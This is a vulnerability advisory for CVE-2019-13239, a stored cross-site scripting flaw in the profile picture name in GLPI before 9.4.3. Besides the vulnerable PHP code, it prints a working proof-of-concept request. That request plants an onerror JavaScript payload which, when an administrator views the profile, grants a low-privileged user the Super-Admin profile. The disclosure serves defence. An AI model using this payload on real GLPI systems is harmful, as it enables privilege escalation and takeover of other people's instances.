Allele Security Alert
ASA-2019-00476
Identifier(s)
ASA-2019-00476, CVE-2019-13239
Title
Stored Cross-Site Scripting (XSS) in the profile picture name
Vendor(s)
GLPI Project
Product(s)
GLPI
Affected version(s)
GLPI versions 9.x before 9.4.3
Fixed version(s)
GLPI version 9.4.3
Proof of concept
Yes
Description
It has been discovered that GLPI does not sanitize the profile picture name which can be used to inject malicious HTML and JavaScript code inside the page. If an administrator access the profile, it can be used to interact with the GLPI instance with the administrator profile and perform sensitive actions such as add the low privileges account to the Super-Admin group.
Technical details
The user profile form allows uploading images as profile picture. This is done in 2 steps:
- AJAX upload of the file.
- Update the profile with the filename retrieved from the 1st AJAX request.
This profile picture is the filename of the uploaded image and this filename is stored in the database.
The POST request looks like:
POST /front/preference.php HTTP/1.1 Host: 172.18.0.3 […] ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="name" testuser ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="id" 5 ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="realname" ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="_picture[0]" 5c6fc312b8ab50.57540855chat5.jpg ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="_prefix_picture[0]" 5c6fc312b8ab50.57540855 ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="_tag_picture[0]" 435b1b81-d9d62df8-5c6fc312c12e01.39237464 ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="picture[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarynhQG0l132nzGvcpA Content-Disposition: form-data; name="_blank_picture" […]
However, the code responsible for the preferences updates the user model with the request inputs:
if (isset($_POST["update"]) && ($_POST["id"] === Session::getLoginUserID())) {
$user->update($_POST);
[...]
As the user model has a picture field, it is possible to update the profile with malicious HTML attributes and execute JavaScript inside the web browser. For instance, the following preferences update can be used to perform a local privilege escalation if an administrator views the profile:
POST /front/preference.php HTTP/1.1
Host: 172.18.0.3
[…]
------WebKitFormBoundarynhQG0l132nzGvcpA
Content-Disposition: form-data; name="name"
testuser
------WebKitFormBoundarynhQG0l132nzGvcpA
Content-Disposition: form-data; name="id"
5
[…]
------WebKitFormBoundarynhQG0l132nzGvcpA
Content-Disposition: form-data; name="picture[]"; filename=""
Content-Type: application/octet-stream
'
onerror="$.ajax({url:'/front/profile_user.form.php',method:'POST',data:'users_id=5&entities _id=0&profiles_id=4&is_recursive=0&add=Add&_glpi_csrf_token='+$ ('input[name=_glpi_csrf_token]').val()});" a='
This payload will add the Super-Admin profile (profiles_id=4) to the user (users_id=5).
The code is inserted without any sanitization by the function showMyForm in inc/user.class.php:
[...]
$full_picture = "<div class='user_picture_border'>";
$full_picture .= "<img class='user_picture' alt=\"".__s('Picture')."\" src='".
User::getURLForPicture($this->fields['picture'])."'>";
$full_picture .= "</div>";
[...]
The getURLForPicture function does not sanitize the string, allowing inserting HTML.
Credits
Julien Legras (Synactiv)
Reference(s)
Stored XSS in GLPI < 9.4.3
https://www.synacktiv.com/ressources/advisories/GLPI_9.4.0_stored_XSS.pdf
avoid xss attack on user picture
https://github.com/glpi-project/glpi/commit/c2aa7a7cd6af28be3809acc7e7842d2d2008c0fb
CVE-2019-13239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13239
CVE-2019-13239
https://nvd.nist.gov/vuln/detail/CVE-2019-13239
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: August 5, 2019